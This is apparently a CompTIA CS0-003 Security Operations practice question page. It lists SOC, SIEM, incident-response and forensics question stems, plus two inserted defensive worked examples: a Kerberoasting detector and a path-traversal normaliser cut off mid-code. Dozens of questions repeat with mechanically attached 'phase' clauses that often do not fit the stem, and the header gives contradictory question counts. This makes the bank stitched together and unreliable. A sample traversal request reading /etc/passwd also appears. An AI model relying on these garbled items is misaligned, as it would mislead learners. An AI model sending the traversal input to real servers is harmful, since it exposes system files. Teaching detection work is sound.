Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


CS0-003 Security Operations • Complete Question Bank

CS0-003 Security Operations — All Questions With Answers

Complete CS0-003 Security Operations question bank — all 0 questions with answers and detailed explanations.

162 questions · Free · No signup
Question 1 (hard, multi select)

A SIEM correlation rule for impossible travel is creating noise from VPN users. Which refinements should improve fidelity? (Choose two.)

Question 2 (medium, multi select)

A SOC is onboarding endpoint logs into a SIEM. Which fields are most important for process-chain investigations? (Choose three.)

Question 3 (hard, multi select)

A threat hunter suspects data exfiltration over HTTPS from a database server. Which data sources are most useful? (Choose two.)

Question 4 (medium, multi select)

A SOC wants to reduce alert fatigue without missing confirmed malicious activity. Which actions are appropriate? (Choose two.)

Question 5 (hard, multi select)

Which signals strengthen an alert for Kerberoasting activity? (Choose two.)

Question 6 (medium, multi select)

A detection engineer is writing a Sigma rule for suspicious rundll32 usage. Which fields should be included? (Choose two.)

Question 7 (hard, multi select)

A cloud workload identity begins accessing secrets outside its normal application scope. Which evidence should be reviewed? (Choose two.)

Question 8 (medium, multi select)

A phishing detection rule looks only for known malicious URLs and misses newly registered lookalike domains. Which improvements help? (Choose two.)

Question 9 (hard, multi select)

An analyst suspects DNS tunnelling but wants to avoid over-escalating normal CDN behaviour. Which comparisons help? (Choose two.)

Question 10 (medium, multi select)

A SOAR playbook enriches suspicious IP addresses. Which enrichment sources are useful? (Choose two.)

Question 11 (hard, multi select)

A SOC is tuning a detection for suspected DNS tunnelling. Which evidence points are useful before escalating the alert? (Choose two.)

Question 12 (hard, multi select)

A malware alert shows a signed binary performing suspicious actions. Which facts help decide whether it is living-off-the-land abuse? (Choose two.)

Question 13 (medium, multi select)

Which evidence helps distinguish a true brute-force attack from a misconfigured service account? (Choose two.)

Question 14 (hard, multi select)

A Kubernetes audit alert shows a service account creating privileged pods. Which checks are most relevant? (Choose two.)

Question 15 (medium, multi select)

An IDS signature fires on outbound traffic but analysts suspect a false positive. Which validation steps are appropriate? (Choose two.)

Question 16 (hard, multi select)

A SOC wants to measure whether alert enrichment is improving operations. Which metrics are useful? (Choose two.)

Question 17 (easy, multiple choice)

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant?

Question 18 (hard, multiple choice)

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected?

Question 19 (medium, multiple choice)

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as?

Question 20 (hard, multiple choice)

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix?

Question 21 (medium, multiple choice)

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 22 (medium, multiple choice)

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 23 (hard, multiple choice)

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 24 (medium, multiple choice)

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 25 (medium, multiple choice)

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 26 (medium, multi select)

An analyst is creating a detection for suspicious PowerShell. Which conditions improve fidelity? (Choose two.)

Question 27 (hard, multiple choice)

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 28 (medium, multiple choice)

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 29 (medium, multiple choice)

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 30 (hard, multiple choice)

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 31 (medium, multiple choice)

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 32 (hard, multiple choice)

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 33 (medium, multiple choice)

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 34 (medium, multiple choice)

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 35 (medium, multiple choice)

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 36 (hard, multiple choice)

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 37 (easy, multiple choice)

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 38 (hard, multiple choice)

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 39 (medium, multiple choice)

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 40 (hard, multiple choice)

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 41 (medium, multiple choice)

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 42 (medium, multiple choice)

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 43 (hard, multiple choice)

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 44 (medium, multiple choice)

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 45 (medium, multiple choice)

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 46 (medium, multiple choice)

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 47 (hard, multiple choice)

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 48 (medium, multiple choice)

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 49 (medium, multiple choice)

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 50 (hard, multiple choice)

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 51 (hard, multiple choice)

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 52 (medium, multiple choice)

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 53 (medium, multiple choice)

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 54 (medium, multiple choice)

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 55 (hard, multiple choice)

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 56 (easy, multiple choice)

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 57 (hard, multiple choice)

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 58 (medium, multiple choice)

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 59 (hard, multiple choice)

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 60 (medium, multiple choice)

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 61 (medium, multiple choice)

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 62 (hard, multiple choice)

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 63 (medium, multiple choice)

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 64 (medium, multiple choice)

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 65 (medium, multiple choice)

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 66 (hard, multiple choice)

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 67 (medium, multiple choice)

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 68 (medium, multiple choice)

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 69 (hard, multiple choice)

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 70 (medium, multiple choice)

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 71 (hard, multiple choice)

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 72 (medium, multiple choice)

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 73 (medium, multiple choice)

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 74 (medium, multiple choice)

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 75 (hard, multiple choice)

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 76 (easy, multiple choice)

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 77 (hard, multiple choice)

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 78 (medium, multiple choice)

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 79 (hard, multiple choice)

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 80 (medium, multiple choice)

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 81 (medium, multiple choice)

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 82 (hard, multiple choice)

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 83 (medium, multiple choice)

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 84 (medium, multiple choice)

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 85 (medium, multiple choice)

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 86 (hard, multiple choice)

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 87 (medium, multiple choice)

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 88 (medium, multiple choice)

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 89 (hard, multiple choice)

A SOC wants a SOAR playbook for suspected phishing that reduces analyst workload but avoids destructive action before confirmation. Which actions are appropriate for the first automated phase? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 90 (medium, multiple choice)

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 91 (hard, multiple choice)

An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the alert triage phase, which action gives the analyst the clearest next triage step?

Question 92 (medium, multiple choice)

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the evidence source phase, which evidence source best supports or refutes the detection?

Question 93 (medium, multiple choice)

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

Question 94 (medium, multiple choice)

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the containment trade-off phase, which response balances containment with evidence preservation?

Question 95 (hard, multiple choice)

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the root-cause analysis phase, which finding would most directly explain the activity?

Question 96 (easy, multiple choice)
Read the full Security Operations explanation →

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant?

Question 97 (hard, multiple choice)
Read the full Security Operations explanation →

A SIEM alert shows one workstation requesting a high number of Kerberos service tickets for many SPNs, followed by no corresponding service access. Which attack should be suspected?
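A worked example of the detection behind this stem, added here and not part of the original question bank. It runs over constructed Windows Security event 4769 (Kerberos service ticket requested) records; the account names, SPNs and addresses are invented. The logic counts distinct SPNs requested per account inside a sliding window and notes how many tickets used RC4 (ticket encryption type 0x17), which Kerberoasting tools request by default because RC4 tickets crack far faster than AES ones:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed event 4769 records reduced to the fields the detection needs.
# Fields: timestamp, requesting account, client address, service name (SPN owner),
# ticket encryption type (0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96).
EVENTS_4769 = [
    ("2024-03-15T09:00:01", "jdoe", "10.10.1.50", "MSSQLSvc/db01", "0x17"),
    ("2024-03-15T09:00:02", "jdoe", "10.10.1.50", "HTTP/web01", "0x17"),
    ("2024-03-15T09:00:02", "jdoe", "10.10.1.50", "MSSQLSvc/db02", "0x17"),
    ("2024-03-15T09:00:03", "jdoe", "10.10.1.50", "svc_backup", "0x17"),
    ("2024-03-15T09:00:03", "jdoe", "10.10.1.50", "svc_sccm", "0x17"),
    ("2024-03-15T09:00:04", "jdoe", "10.10.1.50", "svc_report", "0x17"),
    ("2024-03-15T09:05:00", "asmith", "10.10.1.77", "cifs/fs01", "0x12"),
    ("2024-03-15T09:07:00", "asmith", "10.10.1.77", "HTTP/web01", "0x12"),
]

RC4_HMAC = "0x17"              # requested by default by common Kerberoasting tooling
SPN_THRESHOLD = 5              # distinct SPNs per account within the window; tune per estate
WINDOW = timedelta(minutes=10)


def kerberoast_candidates(events, threshold=SPN_THRESHOLD, window=WINDOW):
    """Return {account: finding} for accounts that requested service tickets for
    at least `threshold` distinct SPNs inside any interval of length `window`."""
    by_account = defaultdict(list)
    for ts, account, client, spn, etype in events:
        by_account[(account, client)].append((datetime.fromisoformat(ts), spn, etype))

    findings = {}
    for (account, client), rows in by_account.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # advance the window start until the interval fits inside `window`
            while rows[end][0] - rows[start][0] > window:
                start += 1
            spns = {spn: etype for _, spn, etype in rows[start:end + 1]}
            if len(spns) < threshold:
                continue
            rc4 = sum(1 for etype in spns.values() if etype == RC4_HMAC)
            best = findings.get(account)
            if best is None or len(spns) > best["distinct_spns"]:
                findings[account] = {"client": client, "distinct_spns": len(spns),
                                     "rc4_tickets": rc4, "spns": sorted(spns)}
    return findings
```

The stem's second clue, ticket requests with no follow-on service access, is a separate check: look for 4624 logons on the SPN hosts from the same client in the minutes after the burst. If the domain enforces AES-only service accounts, the RC4 count drops to zero and the SPN count has to carry the detection on its own.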

Question 98 (medium, multiple choice)
Read the full Security Operations explanation →

A user receives repeated MFA prompts and eventually approves one they did not initiate. How should the analyst classify this behaviour?

Question 99 (hard, multi select)
Read the full Security Operations explanation →

A SIEM receives endpoint, firewall, identity, and cloud logs for the same incident, but timestamps do not align across sources. Which actions should the analyst take before finalizing the timeline? (Choose two.)

Question 100 (medium, multi select)
Read the full Security Operations explanation →

A security analyst is reviewing alerts from multiple security tools. Which three of the following are key indicators of a potential credential-based attack in the environment? (Choose three.)

Question 101 (medium, multi select)
Read the full Security Operations explanation →

An incident response team is analyzing a suspected malware outbreak on a corporate network. Which three of the following actions should be performed as part of the containment phase? (Choose three.)

Question 102 (medium, multi select)
Read the full Security Operations explanation →

A Security Operations Center (SOC) analyst is tuning a SIEM rule to reduce false positives. Which three of the following are valid approaches to improve the signal-to-noise ratio of a detection rule? (Choose three.)

Question 103 (medium, multi select)
Read the full Security Operations explanation →

During a threat hunting exercise, a security analyst discovers unusual outbound traffic from a server that typically only communicates internally. Which three of the following are effective actions to validate and respond to this finding? (Choose three.)

Question 104 (medium, multi select)
Read the full Security Operations explanation →

A security analyst is reviewing the output of a recent vulnerability scan and correlating it with threat intelligence feeds. Which four of the following actions are most appropriate for an effective security operations workflow? (Choose four.)

Question 105 (medium, drag order)
Read the full Security Operations explanation →

Arrange the steps for conducting a security incident response in the correct order.

Question 106 (medium, drag order)
Read the full Security Operations explanation →

Arrange the steps for configuring a firewall rule set in the correct order.

Question 107 (medium, drag order)
Read the full Security Operations explanation →

Arrange the steps for a typical digital forensics investigation process.

Question 108 (medium, matching)
Read the full Security Operations explanation →

Match each security tool to its primary purpose.

Network scanning and enumeration

Packet analysis

Exploitation framework

Web application security testing

Intrusion detection and prevention

Question 109 (medium, matching)
Read the full Security Operations explanation →

Match each vulnerability scanning concept to its definition.

Alert on non-existent vulnerability

Missed actual vulnerability

Scan with authenticated access

Scan without authenticated access

Standard severity rating for vulnerabilities

Question 110 (medium, matching)
Read the full Security Operations explanation →

Match each regulatory framework to its focus.

Data privacy in EU

Payment card security

Healthcare data protection

Financial reporting controls

Federal information security

Question 111 (easy, multiple choice)
Read the full Security Operations explanation →

An analyst runs a command to check active network connections on a Linux host and sees many ESTABLISHED connections to an external IP on port 443. Which command was most likely used?

Question 112 (medium, multiple choice)
Read the full Security Operations explanation →

During incident response, a team isolates a host but needs to preserve volatile evidence. What should be done first?

Question 113 (hard, multiple choice)
Read the full NAT/PAT explanation →

A SOC analyst notices a spike in outbound traffic from a server that normally only serves web pages. The signature-based IDS did not alert. What should the analyst do next?

Question 114 (easy, multiple choice)
Read the full Security Operations explanation →

Which SIEM component is responsible for centralizing and correlating logs from multiple sources?

Question 115 (medium, multiple choice)
Read the full Security Operations explanation →

An analyst wants to capture all traffic to and from a specific IP address for analysis. Which command-line tool is most appropriate?

Question 116 (hard, multiple choice)
Read the full Security Operations explanation →

During a forensic investigation, an analyst finds a suspicious registry key that runs a program at startup. What is the best way to determine if the program is malicious?

Question 117 (hard, multiple choice)
Read the full Security Operations explanation →

An organization uses a SIEM with a rule that triggers when a user fails to authenticate five times within 10 minutes. Last night, the rule fired for a service account from an internal IP. What should be the first triage step?

Question 118 (easy, multiple choice)
Read the full Security Operations explanation →

An analyst needs to identify which process on a Windows system is making outbound connections to the internet. Which tool should be used?

Question 119 (medium, multiple choice)
Read the full Security Operations explanation →

A security analyst receives an alert from the HIDS indicating that a critical configuration file was modified unexpectedly. What is the best immediate action?

Question 120 (medium, multi select)
Read the full Security Operations explanation →

Which TWO of the following are essential steps in the incident response phase of 'Containment, Eradication, and Recovery'? (Choose two.)

Question 121 (hard, multi select)
Read the full Security Operations explanation →

Which THREE of the following are common indicators of a data exfiltration attempt? (Choose three.)

Question 122 (easy, multi select)
Read the full Security Operations explanation →

Which TWO of the following are best practices for securing a network firewall configuration? (Choose two.)

Question 123 (easy, multiple choice)
Read the full Security Operations explanation →

A company's IDS generated an alert for a potential SQL injection attack on a web application. The security analyst reviews the alert and confirms that the application is protected by a Web Application Firewall (WAF) that filters SQL injection attempts. Which of the following is the best course of action?

Question 124 (easy, multiple choice)
Read the full DNS explanation →

A SOC analyst receives an alert about a potential data exfiltration via DNS tunneling. Which of the following tools would best help the analyst investigate the alert?

Question 125 (easy, multiple choice)
Read the full Security Operations explanation →

A security team is reviewing firewall logs and identifies traffic to a known malicious IP address from an internal workstation running a critical business application that cannot be interrupted. Which of the following is the most appropriate immediate action?

Question 126 (medium, multiple choice)
Read the full Security Operations explanation →

A company is implementing a security monitoring solution for its cloud infrastructure. The security team wants to detect attempts to disable logging on critical instances. Which of the following should be configured?

Question 127 (medium, multiple choice)
Read the full Security Operations explanation →

During a containment phase of an incident response, the team needs to prevent an infected host from communicating with a command-and-control server. The host is a critical database server that cannot be taken offline. Which of the following containment strategies is most appropriate?

Question 128 (medium, multiple choice)
Read the full NAT/PAT explanation →

A security analyst is configuring a SIEM correlation rule to detect multiple failed login attempts followed by a successful login from the same source IP within a short time window. This pattern suggests a successful brute-force attack. Which of the following correlation types should the analyst use?

Question 129 (hard, multiple choice)
Read the full Security Operations explanation →

A security analyst is investigating a potential data breach and needs to collect evidence from a compromised Windows server. The server is still running, and the analyst wants to capture memory, network connections, and process list without writing unnecessary data to disk. Which of the following sequences of commands (tools) should the analyst use to adhere to order of volatility?

Question 130 (hard, multiple choice)
Read the full Security Operations explanation →

A company uses a centralized logging solution. A security analyst receives a log from a host indicating a user account 'jsmith' was created locally on a server. The analyst suspects this is a backdoor account. Which of the following log sources would provide the most context to confirm the creation method and identify the responsible process?

Question 131 (hard, multiple choice)
Read the full Security Operations explanation →

During a penetration test, a tester successfully exploits a vulnerability in a web application and gains a shell on the backend server. The tester then attempts to pivot to other hosts. Which of the following security controls would be most effective in limiting lateral movement in this scenario?

Question 132 (easy, multi select)
Read the full Security Operations explanation →

Which TWO of the following are best practices for secure log management? (Choose two.)

Question 133 (medium, multi select)
Read the full Security Operations explanation →

A security analyst is reviewing a suspicious email attachment. Which THREE of the following are safe analysis techniques? (Choose three.)

Question 134 (hard, multi select)
Read the full Security Operations explanation →

A SOC team is tuning a SIEM to reduce false positives. Which THREE of the following metrics should the team consider when evaluating detection effectiveness? (Choose three.)

Question 135 (easy, multiple choice)
Read the full Security Operations explanation →

Refer to the exhibit. The output is from a Linux system running `netstat -an`. Which of the following ports is likely being used for remote command-and-control communication?

Exhibit

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 10.0.0.5:54321         198.51.100.20:443        ESTABLISHED
tcp        0      0 192.168.1.10:80         0.0.0.0:*               LISTEN     
udp        0      0 0.0.0.0:53              0.0.0.0:*
Question 136 (medium, multiple choice)
Read the full NAT/PAT explanation →

Refer to the exhibit. The JSON firewall rule is applied to a network segment. A security analyst needs to ensure that traffic from a new subnet 10.0.1.0/24 to the same destination is also allowed. Which of the following modifications should the analyst make?

Exhibit

{
  "rule_name": "Allow-Web",
  "source_zone": "inside",
  "destination_zone": "DMZ",
  "source_ip": "10.0.0.0/24",
  "destination_ip": "172.16.0.10",
  "destination_port": 443,
  "action": "allow"
}
Question 137 (hard, multiple choice)
Read the full Security Operations explanation →

Refer to the exhibit. The snippet is from a Windows Security log showing event ID 4688 (Process Creation). Which of the following actions should the analyst take first?

Exhibit

LogName=Security
EventID=4688
NewProcessName=C:\Windows\System32\rundll32.exe
CreatorProcessName=C:\Users\admin\AppData\Local\Temp\svchost.exe
ProcessID=0x1234
CreatorProcessID=0x5678
CommandLine=rundll32.exe shell32.dll,Control_RunDLL
Question 138 (medium, multiple choice)
Read the full Security Operations explanation →

A security analyst notices that an IDS is generating a high number of false positives for legitimate encrypted traffic. Which tuning method should the analyst use to reduce false positives without reducing detection capability?

Question 139 (easy, multiple choice)
Read the full Security Operations explanation →

During an incident response, the team identifies that a workstation was compromised via a phishing email. Which of the following should be performed immediately after containment?

Question 140 (hard, multiple choice)
Read the full Security Operations explanation →

A security analyst is reviewing SIEM alerts and sees multiple failed logon events from a single external IP address across several user accounts within two minutes. The source IP is from a known malicious geolocation. What type of attack is most likely occurring?

Question 141 (medium, multiple choice)
Read the full NAT/PAT explanation →

A company wants to ensure that all servers are patched within 30 days of a critical patch release. The security team must verify compliance without causing downtime. Which of the following is the best approach?

Question 142 (easy, multiple choice)
Read the full Ansible explanation →

An organization's incident response playbook specifies that after a confirmed malware infection, the infected system should be isolated from the network. Which action best achieves isolation?

Question 143 (hard, multiple choice)
Read the full Security Operations explanation →

A forensic analyst is called to acquire data from a live server that is critical to business operations. The server cannot be powered down. Which acquisition method should the analyst use to minimize alteration of volatile data?

Question 144 (medium, multiple choice)
Read the full Security Operations explanation →

A SOC analyst is reviewing logs from a web server and sees the following request: GET /../../etc/passwd HTTP/1.1. Which type of web attack is this?
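A worked example of recognising this request pattern in bulk, added here and not part of the original question bank. The request lines are constructed; only the first one comes from the stem. The point it adds beyond the stem is normalisation: the same `../` climb arrives URL-encoded (`..%2f`), double-encoded (`%252e%252e`) or with backslashes, and a filter that only looks for the literal string `../` misses all of those. The code decodes until the path stops changing, then walks the segments to see whether `..` ever climbs above the document root:

```python
import posixpath
from urllib.parse import unquote

# Constructed web server access-log request lines (not real traffic).
REQUEST_LINES = [
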